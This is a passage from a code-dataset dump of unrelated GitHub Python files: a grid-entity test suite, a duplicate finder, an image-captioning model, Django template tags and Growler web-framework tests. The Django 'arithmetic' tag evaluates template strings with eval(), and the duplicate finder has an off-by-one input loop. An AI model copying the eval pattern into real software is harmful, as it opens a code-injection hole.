y='ConfirmedCases')\nfig.update_xaxes(rangeslider_visible=True)\nfig.show()","repo_name":"aorursy/new-nb-1","sub_path":"ashish2070_coronavirus-through-visualization.py","file_name":"ashish2070_coronavirus-through-visualization.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22700497850","text":"import sys\nsys.path.insert(1, '../src')\nimport unittest\nimport grid\nimport entity\n\nclass Entity_test(unittest.TestCase):\n\n    def test_get_position(self):\n        g = grid.Grid(10,5,[],0)\n        x = 3\n        y = 3\n        ent = entity.Entity(g)\n        g.place_entity(x, y, ent)\n        self.assertEqual(ent.get_position(), (x,y))\n\n    def test_add_weight(self):\n        g = 
grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        ent.add_weight(3)\n        self.assertEqual(ent.get_weight(), 4)\n\n    def test_get_weight(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        nent = entity.Entity(g, weight=8)\n        self.assertEqual((ent.get_weight(), nent.get_weight()), (1,8))\n\n    def test_is_passive(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        self.assertTrue(ent.is_passive())\n\n    def test_is_agent(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        self.assertFalse(ent.is_agent())\n\n    def test_is_box(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        self.assertFalse(ent.is_box())\n\n    def test_is_plateform(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        self.assertFalse(ent.is_platform())\n\n    def test_is_active(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        self.assertFalse(ent.is_active())\n\n    def test_get_cell(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.Entity(g)\n        cell = grid.Grid_cells(0, 0)\n        ent.set_cell(cell)\n        self.assertEqual(ent.get_cell(), cell)\n\n    def test_distance_to(self):\n        g = grid.Grid(10,5,[],0)\n        x = 3\n        y = 3\n        ent = entity.Entity(g)\n        g.place_entity(x, y, ent)\n        nent = entity.Entity(g)\n        g.place_entity(x+2, y-1, nent)\n        self.assertEqual(ent.distance_to(nent), 3)\n\n    def test_is_adjacente_true(self):\n        g = grid.Grid(10,5,[],0)\n        x = 3\n        y = 3\n        ent = entity.Entity(g)\n        g.place_entity(x, y, ent)\n        nent = entity.Entity(g)\n        g.place_entity(x, y-1, nent)\n        self.assertTrue(ent.is_adjacent(nent))\n\n    def test_is_adjacente_false(self):\n        g = grid.Grid(10,5,[],0)\n        x = 3\n        y = 3\n        ent = entity.Entity(g)\n        g.place_entity(x, y, ent)\n        nent = entity.Entity(g)\n        g.place_entity(x+1, y-1, nent)\n        self.assertFalse(ent.is_adjacent(nent))\n\nclass ActiveEntity_test(unittest.TestCase):\n\n    def test_is_active(self):\n        g = grid.Grid(10,5,[],0)\n        ent = entity.ActiveEntity(g)\n        self.assertTrue(ent.is_active())\n\n\n","repo_name":"lesueur-philippe/SMA","sub_path":"Projet/test/test_entity.py","file_name":"test_entity.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27465924178","text":"from array import *\r\n\r\n\r\ndef findduplicate(arr):\r\n    for i in range(len(arr)):\r\n        for j in range(i + 1, len(arr)):\r\n            if arr[i] == arr[j]:\r\n                print(arr[i])\r\n    # or\r\n    \"\"\" Let say nums[ 1, 3, 2, 3 ]\r\n    while nums[0] != nums[nums[0]]: # i.e nums[0] (1) != nums[nums[0]] (nums[1] = 3), the index 0 will keep changing\r\n        nums[nums[0]], nums[0] = nums[0], nums[nums[0]] # so swap, we get nums[ 3, 1, 2, 3 ] nums[0] = 3 and nums[1] = 1\r\n    return nums[0] # now, nums[0] (3) == nums[nums[0]] (nums[3] = 3)\r\n    \"\"\"\r\n\r\n\r\narr = []\r\nn = int(input(\"Enter number of elements: \"))\r\nfor i in range(n + 1):\r\n    x = int(input('Enter array elements: '))\r\n    arr.append(x)\r\nprint(arr)\r\nfindduplicate(arr)\r\n","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Example/Find Duplicate Number.py","file_name":"Find Duplicate Number.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"39513791266","text":"\ndef get_first_and_last_data_of_DF(df):\n\n    earliestDate = df.iloc[0]['Date'].split('-')\n    startYear = earliestDate[0]\n    startMonth = earliestDate[1]\n    startDays = earliestDate[2]\n    \n    latestDate = df.iloc[-1]['Date'].split('-')\n    endingYear = latestDate[0]\n    endingMonth = latestDate[1]\n    endingDays = 
latestDate[2]\n\n return startYear, startMonth, startDays, endingYear, endingMonth, endingDays\n","repo_name":"Rperez1988/abcd_script","sub_path":"trading_bot/cerebro/data_manipulation/first_and_last_date_of_DF.py","file_name":"first_and_last_date_of_DF.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"811346459","text":"################################################################################\n# CSE 253: Programming Assignment 4\n# Code snippet by Ajit Kumar, Savyasachi\n# Fall 2020\n# Finely implemented and refined by Colin Wang, Jerry Chan\n################################################################################\n\nimport torch.nn as nn\nimport torch\nimport torchvision.models as models\nimport numpy as np\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n# Build and return the model here based on the configuration.\ndef get_model(config_data):\n hidden_size = config_data['model']['hidden_size']\n embedding_size = config_data['model']['embedding_size']\n model_type = config_data['model']['model_type']\n if config_data['model']['device'] == 'cuda':\n return baseline(config_data).cuda()\n return baseline(config_data)\n \nclass baseline(nn.Module):\n def __init__(self, config_data):\n super(baseline, self).__init__()\n self.config = config_data['model']\n self.model_type = config_data['model']['model_type']\n\n # encoder\n resnet = models.resnet50(pretrained = True)\n pretrain_outshape = resnet.fc.in_features\n self.resnet = nn.Sequential(*list(resnet.children())[:-1])\n self.linear = nn.Linear(pretrain_outshape, \n \t\t\t\t\t\tself.config['embedding_size'])\n self.bn = nn.BatchNorm1d(self.config['embedding_size'], momentum=0.01)\n\n # decoder\n self.embedding = nn.Embedding(self.config['vocab_size'], \n \t\t\t\t\t\t\t self.config['embedding_size'])\n if self.model_type == 'baseline':\n self.rnn = nn.LSTM(input_size = self.config['embedding_size'],\n hidden_size = self.config['hidden_size'], \n batch_first=True)\n if self.model_type == 'arch2':\n self.rnn = nn.LSTM(input_size = self.config['embedding_size'] * 2,\n hidden_size = self.config['hidden_size'], \n batch_first=True)\n if self.model_type == 'rnn':\n self.rnn = nn.RNN(input_size = self.config['embedding_size'],\n hidden_size = self.config['hidden_size'], \n batch_first=True)\n self.fc = nn.Linear(self.config['hidden_size'], \n \t\t\t\t\tself.config['vocab_size'])\n\n # freeze the encoder parameters if not fine-tune\n if not self.config['finetune']:\n self.freeze() \n \n def forward(self, images, captions):\n \t# getting image feature vectors\n features = self.resnet(images)\n features = features.reshape(features.size(0), -1)\n features = self.bn(self.linear(features))\n\n # embed/concatenate image feature vectors with caption embeddings\n if self.model_type == 'arch2':\n captions = torch.cat([torch.zeros((captions.shape[0],1), \n \t\t\t\t\t device = 'cuda', \n \t\t\t\t\t dtype = torch.long), \n captions[:,:-1]],1)\n embed = self.embedding(captions) # batch_size, seq_len, embed_size\n if self.model_type == 'baseline' or self.model_type == 'rnn':\n embed = torch.cat((features.unsqueeze(1), embed), dim = 1)\n lengths = [len(cap) for cap in captions]\n if self.model_type == 'arch2':\n features = features.view([features.shape[0], 1, -1])\\\n \t\t\t\t .repeat((1,captions.shape[1] ,1))\n embed = torch.cat([features, embed],2)\n\n # pack sequential embeddings and send to rnn\n # getting results with a linear layer\n 
embed = pack_padded_sequence(embed, lengths, batch_first=True)\n rnn_outputs, _ = self.rnn(embed)\n out = self.fc(rnn_outputs[0])\n return out\n\n def sample(self, images, max_length, mode, temperature, device):\n \t# initialize variables\n softmax = nn.Softmax(dim=1)\n sampled_ids = []\n\n # getting image feature vectors\n with torch.no_grad():\n features = self.resnet(images)\n features = features.reshape(features.size(0), -1)\n features = self.bn(self.linear(features)).unsqueeze(1)\n inputs = features\n\n # create initial paddings if model is arch2\n if self.model_type == 'arch2':\n image_features = inputs.clone()\n inputs = self.embedding(torch.zeros((images.shape[0],1),\n \t\t\t\t\t\tdevice = 'cuda', \n \t\t\t\t\t\tdtype = torch.long))\n states = None\n\n # generate captions word by word\n for i in range(max_length):\n if self.model_type == 'arch2':\n inputs = torch.cat([image_features, inputs], 2)\n rnn_outputs, states = self.rnn(inputs, states) \n rnn_outputs = rnn_outputs.squeeze(1) \n out = self.fc(rnn_outputs)\n caption_idx = self.generate_idx(mode, \n \tout, softmax, temperature, device)\n sampled_ids.append(caption_idx)\n inputs = self.embedding(caption_idx).unsqueeze(1)\n\n # integrate\n sampled_ids = torch.stack(sampled_ids, 1)\n return sampled_ids\n\n def generate_idx(self, mode, out, softmax, temperature, device):\n \t# determinstic mode, where we use greedy search algorithm\n if mode == 'deterministic':\n _, caption_idx = out.max(1)\n\n # stochastic mode, where we soften the distribution by a factor, \n # and then sampling from this distribution with softmax\n elif mode == 'stochastic':\n soft_out = softmax(out/temperature)\n p = soft_out.data.cpu().numpy()\n caption_idx = [np.random.choice(p.shape[1], p=p[j]) \\\n \t\t\t\tfor j in range(p.shape[0])]\n caption_idx = torch.tensor(caption_idx, dtype=torch.long)\n if device == 'cuda':\n caption_idx = caption_idx.cuda()\n else:\n raise Exception('Failed to recognize generation mode')\n return caption_idx\n \n def freeze(self):\n \t# freeze all parameters in resnet \n \t# (except for the last layer that is not included in the resnet model)\n for param in self.resnet.parameters():\n param.requires_grad_(False)\n","repo_name":"JerryYC/Intro-to-Deep-Learning-Projects","sub_path":"Image Captioning/code/model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32171864051","text":"from django import template\n\n\nregister = template.Library()\n\n@register.inclusion_tag('blogs/pager.html')\ndef pager(page, page_view=2):\n page_num = page.number\n paginator = page.paginator\n\n pages_list = [x for x in range(page_num - page_view, page_num + page_view + 1) if x >= 1 and x <= paginator.num_pages]\n if pages_list[0] != 1:\n pages_list.insert(0, 1)\n\n if pages_list[-1] != paginator.num_pages:\n pages_list.append(paginator.num_pages)\n\n if len(pages_list) >= 2:\n if pages_list[1] >= 3:\n pages_list.insert(1, '...')\n\n if pages_list[-2] < paginator.num_pages - 1:\n pages_list.insert(-1, '...')\n\n return {\n 'page_current': page,\n 'pages_list': pages_list,\n }\n\n\n@register.simple_tag\ndef arithmetic(operation_string, *args, **kwargs):\n if not args:\n val = eval(operation_string)\n else:\n val = eval(operation_string % args)\n\n if 'change_int' in kwargs:\n if kwargs['change_int']:\n return int(val)\n\n return 
val","repo_name":"himluo/myblog","sub_path":"blogs/templatetags/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16145578352","text":"#\n# test_app\n#\n\nimport re\nimport sys\nimport types\nimport pytest\nfrom asyncio.coroutines import iscoroutine\n\nfrom mocks import * # noqa\nfrom unittest import mock\nfrom growler import growler, Application, GrowlerStopIteration\n\n\nfrom mock_classes import (\n MockRequest,\n MockResponse,\n MockProtocolHttp,\n)\n\nres = mock_res\n\n@pytest.fixture\ndef app_name():\n return 'GrowlerApplication'\n\n\n@pytest.fixture\ndef mock_MiddlewareChain():\n return mock.create_autospec(growler.MiddlewareChain)\n\n\n@pytest.fixture\ndef use_mock_middlewarechain():\n return False\n\n@pytest.fixture\ndef proto():\n proto = mock.create_autospec(growler.http.GrowlerHTTPProtocol)\n return proto\n\n\n@pytest.fixture\ndef req_uri():\n return '/'\n\n\n@pytest.fixture\ndef req(req_uri):\n return mock.Mock(spec=growler.http.HTTPRequest,\n path=req_uri,\n method=0x01)\n\n\n@pytest.fixture\ndef app(app_name, mock_MiddlewareChain, use_mock_middlewarechain, MockProtocolHttp):\n\n mw_chain = mock_MiddlewareChain if use_mock_middlewarechain else None\n result = Application(app_name,\n request_class=MockRequest,\n response_class=MockResponse,\n middleware_chain=mw_chain)\n return result\n\n\n@pytest.fixture\ndef app_with_router(app, mock_router):\n app.middleware.add(growler.http.methods.HTTPMethod.ALL, '/', mock_router)\n return app\n\n\ndef test_application_constructor():\n app = growler.Application('Test')\n assert app.name == 'Test'\n\n\ndef test_application_constructor_alternate_middleware_type():\n app = growler.Application('Test', middleware_chain=list)\n assert app.middleware == []\n\n\n@pytest.mark.parametrize(\"use_mock_middlewarechain\", [True])\ndef test_app_fixture(app, app_name, mock_MiddlewareChain, MockProtocolHttp):\n assert isinstance(app, growler.Application)\n assert app.middleware is mock_MiddlewareChain\n assert app._request_class is MockRequest\n assert app._response_class is MockResponse\n\n\ndef test_application_saves_config():\n val = 'B'\n app = growler.Application('Test', A=val)\n assert app.config['A'] is val\n\n\ndef test_application_enables_x_powered_by(app):\n \"\"\" Test application enables x-powered-by by default \"\"\"\n assert app.enabled('x-powered-by')\n\n\ndef test_all(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.all('/', m)\n mock_router.all.assert_called_with('/', m)\n\n\ndef test_get(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.get('/', m)\n mock_router.get.assert_called_with('/', m)\n\n\ndef test_post(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.post('/', m)\n mock_router.post.assert_called_with('/', m)\n\n\ndef test_put(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.put('/', m)\n mock_router.put.assert_called_with('/', m)\n\n\ndef test_delete(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.delete('/', m)\n mock_router.delete.assert_called_with('/', m)\n\n\ndef test_use_function(app, mock_route_generator):\n m = mock_route_generator()\n app.use(m)\n assert app.middleware.last().func is m\n\n\ndef test_use_tuple(app, mock_route_generator):\n mws = tuple(mock_route_generator() for i in range(3))\n app.use(mws)\n assert len(mws) is len(app.middleware.mw_list)\n assert all((a.func is b for a, b in 
zip(app.middleware.mw_list, mws)))\n\n\ndef test_use_list(app, mock_route_generator):\n mw_list = [mock_route_generator() for i in range(3)]\n app.use(mw_list)\n assert len(mw_list) is len(app.middleware.mw_list)\n assert all((a.func is b for a, b in zip(app.middleware.mw_list, mw_list)))\n\n\ndef test_use_growler_router(app, mock_route_generator):\n m = mock.Mock()\n route = mock_route_generator()\n m.__growler_router = route\n app.use(m)\n assert app.middleware.last().func is route\n\n\ndef test_use_growler_router_factory(app, mock_route_generator):\n router = mock_route_generator()\n m = mock.Mock()\n m.__growler_router = mock.Mock(spec=types.MethodType,\n return_value=router)\n app.use(m)\n assert m.__growler_router.called\n assert app.middleware.last().func is router\n\n\ndef test_use_as_decorator(app):\n\n @app.use\n def test_mw(req, res):\n pass\n\n assert test_mw is not app\n assert app.middleware.last().func is test_mw\n assert app.middleware.last().path is growler.MiddlewareChain.ROOT_PATTERN\n\n\ndef test_use_as_called_decorator(app):\n\n @app.use(path='/foo')\n def test_mw(req, res):\n pass\n\n assert test_mw is not app\n assert app.middleware.last().func is test_mw\n assert app.middleware.last().path == re.compile(re.escape('/foo'))\n\n\ndef test_add_bad_router(app):\n # TODO: Implement real check for mock_router type\n app.strict_router_check = True\n with pytest.raises(TypeError):\n app.add_router(\"/foo\", lambda req, res: res.send_text(\"bad type!\"))\n\n\ndef test_ignore_add_bad_router(app):\n app.strict_router_check = False\n app.add_router(\"/foo\", lambda req, res: res.send_text(\"bad type!\"))\n\n\ndef test_use_growler_router_metaclass(app, mock_route_generator):\n\n class TestMeta(metaclass=growler.RouterMeta):\n\n def get_z(self, req, res): '''/'''\n def get_a(self, req, res): '''/a/a'''\n def get_b(self, req, res): '''/a/b'''\n\n mrouter = TestMeta()\n app.use(mrouter)\n router = app.middleware.mw_list[0].func\n\n assert isinstance(router, growler.Router)\n assert mrouter.get_z == router.mw_list[0].func\n assert mrouter.get_a == router.mw_list[1].func\n assert mrouter.get_b == router.mw_list[2].func\n\n\ndef test_create_server_return_server(app, event_loop, unused_tcp_port):\n \"\"\" Test if the application creates a server coroutine \"\"\"\n from asyncio.base_events import Server\n proto_factory = mock.Mock()\n server_cfg = dict(host='localhost', port=unused_tcp_port)\n\n server = app.create_server(proto_factory,\n loop=event_loop,\n as_coroutine=False,\n **server_cfg)\n\n assert isinstance(server, Server)\n if hasattr(server, '_protocol_factory'):\n assert server._protocol_factory is proto_factory.return_value\n\n\n@pytest.mark.asyncio\nasync def test_create_server_return_coroutine(app, event_loop, unused_tcp_port):\n from unittest.mock import MagicMock\n from asyncio.base_events import Server\n \"\"\" Test if the application creates a server coroutine \"\"\"\n proto_factory = mock.Mock()\n server_config = dict(host='127.1', port=unused_tcp_port)\n server_coroutine = app.create_server(proto_factory,\n as_coroutine=True,\n **server_config)\n\n assert iscoroutine(server_coroutine)\n server = await server_coroutine\n assert isinstance(server, Server)\n if hasattr(server, '_protocol_factory'):\n assert server._protocol_factory is proto_factory.return_value\n proto_factory.assert_called_with(app)\n\n\ndef test_create_server_default_params(app, event_loop, unused_tcp_port):\n \"\"\" Test if the application creates a server coroutine \"\"\"\n from asyncio.base_events 
import Server\n asyncio.set_event_loop(event_loop)\n server = app.create_server(port=unused_tcp_port, host='localhost')\n assert isinstance(server, Server)\n assert server._loop is event_loop\n\n # create_server_call = mock.call(mock.ANY, port=1)\n # assert mock_event_loop.create_server.mock_calls[0] == create_server_call\n\n # run_until_complete_call = mock.call(mock_event_loop.create_server.return_value)\n # assert mock_event_loop.run_until_complete.mock_calls[0] == run_until_complete_call\n\n\ndef test_create_server_and_run_forever(app):\n mock_protocol_factory = mock.Mock()\n mock_event_loop = mock.MagicMock()\n mock_server_coro = mock.Mock()\n mock_event_loop.create_server.return_value = mock_server_coro\n\n host = mock.Mock()\n port = mock.Mock()\n app.create_server_and_run_forever(loop=mock_event_loop,\n protocol_factory=mock_protocol_factory,\n host=host,\n port=port)\n\n mock_protocol_factory.assert_called_once_with(app)\n mock_event_loop.create_server.assert_called_with(mock_protocol_factory.return_value,\n host=host,\n port=port)\n mock_event_loop.run_forever.assert_called_once()\n mock_event_loop.run_until_complete.assert_called_once_with(mock_server_coro)\n\n\ndef test_create_server_and_run_forever_default_params(app):\n \"\"\" Test if the application creates a server \"\"\"\n import asyncio\n\n mock_event_loop = mock.Mock(spec=asyncio.AbstractEventLoop)\n\n # solves a coverage problem\n mock_event_loop.run_forever.side_effect = KeyboardInterrupt\n\n asyncio.set_event_loop(mock_event_loop)\n\n mock_server = mock.Mock()\n mock_event_loop.create_server = mock.MagicMock(return_value=mock_server)\n\n protocol_path = \"growler.aio.GrowlerHTTPProtocol.get_factory\"\n with mock.patch(protocol_path) as mock_get_factory:\n noval = app.create_server_and_run_forever(host='◉', port=1)\n\n assert noval is None\n mock_event_loop.create_server.assert_called_once_with(mock_get_factory.return_value,\n host='◉',\n port=1)\n mock_event_loop.run_until_complete.assert_called_once_with(mock_server)\n mock_event_loop.run_forever.assert_called_with()\n\n\n# @pytest.mark.parametrize(\"method\", [\n# 'get',\n# 'post',\n# 'all',\n# ])\n# def test_forwards_methods(app, mock_router, method):\n# do_something = mock.Mock()\n# app_method = getattr(app, method)\n# app_method('/', do_something)\n#\n# mock_router_m = getattr(router, method)\n# mock_router_m.assert_called_with('/', do_something)\n\n\n# def test_calling_use(app, mock_router):\n# do_something = mock.Mock(spec=types.FunctionType)\n# do_something_else = mock.Mock(spec=types.FunctionType)\n# app.use(do_something).use(do_something_else)\n# assert len(app.middleware) is 2\n\n\n@pytest.fixture\ndef mock_route_generator():\n return lambda: mock.create_autospec(lambda rq, rs: None)\n\ndef test_fixture_mock_event_loop(mock_event_loop):\n assert isinstance(mock_event_loop, asyncio.AbstractEventLoop)\n\ndef test_fixture_app(app: Application, mock_event_loop):\n assert isinstance(app, Application)\n assert len(app.middleware.mw_list) is 0\n\n\ndef test_router_property(app):\n app.router\n assert len(app.middleware.mw_list) is 1\n\n\n# def test_use_with_routified_obj(app, mock_router):\n# obj = mock.Mock()\n# obj.__growler_router = mock.NonCallableMock()\n# app.use(obj)\n# mock_router.add_router.assert_called_with(None, obj.__growler_router)\n\n\n# def xtest_use_with_routified_class(app, mock_router):\n# sub_router = mock.Mock()\n# obj = mock.MagicMock()\n# obj.__growler_router.return_value = sub_router\n# obj.__growler_router.__class__ = types.MethodType\n# 
app.use(obj)\n# mock_router.add_router.assert_called_with(None, sub_router)\n# obj.__growler_router.assert_called()\n\n\ndef test_enable(app):\n app.enable('option')\n assert app.enabled('option')\n\n\ndef test_enabled(app):\n app.enable('option')\n assert app.enabled('opti') is None\n\n\ndef test_disable(app):\n app.enable('option')\n app.disable('option')\n assert not app.enabled('option')\n\n\ndef test_set_get_del_in_config_item(app):\n obj = mock.MagicMock()\n app['obj'] = obj\n assert app['obj'] is obj\n assert 'obj' in app\n del app['obj']\n assert 'obj' not in app\n\n\n@pytest.mark.asyncio\nasync def test_default_error_handler_gets_called(app, req, res):\n\n ex = Exception(\"boom\")\n m_handler = app.default_error_handler = mock.MagicMock()\n @app.use # (mock.MagicMock(side_effect=Exception(\"boom\")))\n def bad_mw(req, res):\n raise ex\n\n app.print_middleware_tree()\n await app.handle_client_request(req, res)\n assert m_handler.called\n m_handler.assert_called_with(req, res, ex)\n\n\ndef test_default_error_handler_sends_res(app, req, res):\n ex = Exception(\"boom\")\n app.default_error_handler(req, res, ex)\n assert res.send_html.called\n\n\n@pytest.mark.asyncio\nasync def test_handle_client_request_coro(app, req, res):\n m = mock.Mock()\n coro = types.coroutine(lambda req, res: m())\n app.use(coro)\n await app.handle_client_request(req, res)\n assert m.called\n\n\n@pytest.mark.asyncio\nasync def test_handle_client_request_exception(app, req, res, mock_route_generator):\n generator = mock.MagicMock()\n handler = mock.MagicMock()\n middleware = mock.Mock(return_value=generator)\n app.middleware = middleware\n\n async def handle_server_err(*args):\n handler(*args)\n\n app.handle_server_error = handle_server_err\n\n ex = Exception(\"boom\")\n m1 = mock_route_generator()\n m1.side_effect = ex\n\n generator.__iter__.return_value = [m1]\n\n await app.handle_client_request(req, res)\n\n assert generator.throw.called\n assert len(handler.mock_calls) is 1\n handler.assert_called_with(req, res, generator, ex)\n\n\n@pytest.mark.asyncio\nasync def test_handle_client_request_nosend(app, req, res, mock_route_generator):\n res.has_ended = False\n\n generator = mock.MagicMock()\n generator.__iter__.return_value = []\n middleware = mock.Mock(return_value=generator)\n app.middleware = middleware\n\n await app.handle_client_request(req, res)\n assert res.send_html.called\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('req_uri, middlewares, called', [\n ('/', [], True),\n # ('/aaa', [], False),\n])\nasync def test_handle_client_request_get(app, req, res, middlewares, called, mock_route_generator):\n m1 = mock_route_generator()\n app.use(m1)\n await app.handle_client_request(req, res)\n assert m1.called is called\n\n\n@pytest.mark.asyncio\nasync def test_handle_header_expect(mock_transport):\n from asyncio import sleep\n from growler.aio import GrowlerHTTPProtocol\n\n app = Application(__name__)\n\n payload = b'123abc'\n http_req = (\"POST / HTTP/1.1\\nHost: test\\nExpect: 100-continue\\n\"\n f\"content-length: {len(payload)}\\n\\n\").encode() + payload\n\n protocol = GrowlerHTTPProtocol(app)\n protocol.connection_made(mock_transport)\n\n responder = protocol.responders[0]\n protocol.data_received(http_req)\n req = responder.req\n res = responder.res\n\n assert 'EXPECT' in req.headers\n assert not res.has_sent_continue\n\n # allow event loop to move to app.handle_client_request\n await sleep(0)\n\n assert res.has_sent_continue\n assert mock_transport.write.mock_calls[0] == mock.call(b'HTTP/1.1 
100 Continue\\r\\n\\r\\n')\n\n\n@pytest.mark.asyncio\nasync def test_middleware_stops_with_stop_iteration(app, req, res):\n async def do_something(req, res):\n return None\n\n def mock_function():\n # this coroutine required to let test pass - unknown why\n # return asyncio.coroutine(mock.create_autospec(do_something))\n return mock.create_autospec(do_something)\n\n m1 = mock_function()\n m2 = mock_function()\n\n m1.side_effect = GrowlerStopIteration\n\n app.use(m1)\n app.use(m2)\n\n await app.handle_client_request(req, res)\n\n assert not m2.called\n\n\n@pytest.mark.asyncio\nasync def test_middleware_stops_with_res(app, req, res):\n res.has_ended = False\n\n def set_has_ended(Q, S):\n res.has_ended = True\n\n m1 = mock.MagicMock(spec=set_has_ended,\n __name__='set_has_ended',\n __qualname__='set_has_ended',\n __annotations__={},\n __code__=set_has_ended.__code__)\n m2 = mock.MagicMock(spec=set_has_ended,\n __name__='set_has_ended',\n __qualname__='set_has_ended',\n __annotations__={},\n __code__=set_has_ended.__code__,\n side_effect=set_has_ended)\n m3 = mock.MagicMock(spec=set_has_ended,\n __name__='set_has_ended',\n __qualname__='set_has_ended',\n __annotations__={},\n __code__=set_has_ended.__code__)\n\n app.use(m1)\n app.use(m2)\n app.use(m3)\n\n await app.handle_client_request(req, res)\n\n assert m1.called\n assert m2.called\n assert not m3.called\n\n\n@pytest.mark.asyncio\nasync def test_middleware_stops_with_growlerstopiter(app, req, res):\n res.has_ended = False\n\n m0 = mock.MagicMock()\n m1 = mock.MagicMock()\n\n @app.use\n def passes(req, res):\n m0(req, res)\n\n @app.use\n def stop_iter(req, res):\n raise GrowlerStopIteration\n\n @app.use\n def passes_again(req, res):\n m1(req, res)\n\n await app.handle_client_request(req, res)\n\n m0.assert_called_with(req, res)\n m1.assert_not_called\n assert res.has_ended == False\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error(app, req, res):\n m1 = mock.create_autospec(lambda rq, rs, er: None)\n m2 = mock.create_autospec(lambda rq, rs, er: None)\n def set_has_ended(Q, S, E):\n res.has_ended = True\n\n m1.side_effect = set_has_ended\n generator = mock.MagicMock()\n generator.__iter__.return_value = [m1, m2]\n err = mock.MagicMock()\n\n await app.handle_server_error(req, res, generator, err)\n assert m1.called\n assert not m2.called\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error_awaitable(app, req, res):\n res.has_ended = False\n ex = Exception(\"Boom\")\n m0 = mock.MagicMock()\n eh = mock.MagicMock()\n m1 = mock.MagicMock()\n\n def m_call(m):\n return lambda req, res: m(req, res)\n\n async def ehandle(req, res, err):\n eh(req, res, err)\n assert err is None\n\n async def oops(req, res):\n raise ex\n\n app.use(m_call(m0))\n app.use(ehandle)\n e = app.middleware.mw_list[-1]\n\n app.use(m_call(m1))\n app.use(oops)\n app.print_middleware_tree()\n await app.handle_client_request(req, res)\n\n m0.assert_called_with(req, res)\n m1.assert_called_with(req, res)\n eh.assert_called_with(req, res, ex)\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error_sends_status_500(app, req, res):\n ex = Exception(\"Boom!\")\n gen = mock.MagicMock()\n\n @app.use\n def raises_err(rq, rs):\n gen(rq, rs)\n raise ex\n\n await app.handle_client_request(req, res)\n gen.assert_called_once_with(req, res)\n args = res.send_html.call_args[0]\n assert args[1] == 500\n assert '500 -' in args[0]\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('count, passes', [\n (0, True),\n (Application.error_recursion_max_depth-1, True),\n 
(Application.error_recursion_max_depth, False),\n    (Application.error_recursion_max_depth+2, False),\n])\nasync def test_handle_server_error_max_depth(app, req, res, count, passes):\n    generator = mock.MagicMock()\n    generator.__iter__.return_value = []\n    err = mock.MagicMock()\n\n    if passes:\n        await app.handle_server_error(req, res, generator, err, count)\n    else:\n        with pytest.raises(Exception):\n            await app.handle_server_error(req, res, generator, err, count)\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error_in_error(app, req, res):\n    generator = mock.MagicMock()\n    m1 = mock.create_autospec(lambda rq, rs, er: None)\n    m2 = mock.create_autospec(lambda rq, rs, er: None)\n\n    def reset_iteration(Q, S, E):\n        generator.__iter__.return_value = []\n        raise ex\n\n    ex = Exception(\"boom\")\n    m1.side_effect = reset_iteration\n\n    generator.__iter__.return_value = [m1, m2]\n    err = mock.MagicMock()\n\n    await app.handle_server_error(req, res, generator, err)\n\n    assert m1.called\n    assert not m2.called\n\n\n@pytest.mark.asyncio\nasync def test_response_not_sent(app, req, res):\n    req.method = 0b000001\n    req.path = '/'\n    res.has_ended = False\n\n    def send_req(rq, rs):\n        rs.has_ended = True\n\n    foo = mock.Mock(_is_coroutine=False, side_effect=send_req)\n    app.get(\"/foo\", foo)\n    bar = mock.Mock(_is_coroutine=False, side_effect=send_req)\n    app.get(\"/bar\", bar)\n    app.handle_response_not_sent = mock.Mock()\n    await app.handle_client_request(req, res)\n    foo.assert_not_called()\n    bar.assert_not_called()\n    app.handle_response_not_sent.assert_called_with(req, res)\n","repo_name":"pyGrowler/Growler","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":20568,"program_lang":"python","lang":"en","doc_type":"code","stars":688,"dataset":"github-code","pt":"78"} +{"seq_id":"8589871378","text":"import tensorflow as tf\nimport tflearn\n\n\nclass TextImgCNN(object):\n\n    def __init__(self, sequence_length, num_classes, vocab_size,\n                 embedding_size, filter_sizes, num_filters, output_image_width, encoding_height,\n                 l2_reg_lambda=0.0):\n\n        # Placeholders for input, output and dropout\n        self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name='input_x')\n        self.input_mask = tf.placeholder(tf.float32, [None, output_image_width, output_image_width, 3], name='input_mask')\n        self.input_y = tf.placeholder(tf.float32, [None, num_classes], name='input_y')\n        self.dropout_keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')\n\n        # resize images\n        # size: [new_height, new_width] is the new size for the images.\n        resized_images = tf.image.resize_images(self.input_mask, [output_image_width - encoding_height, 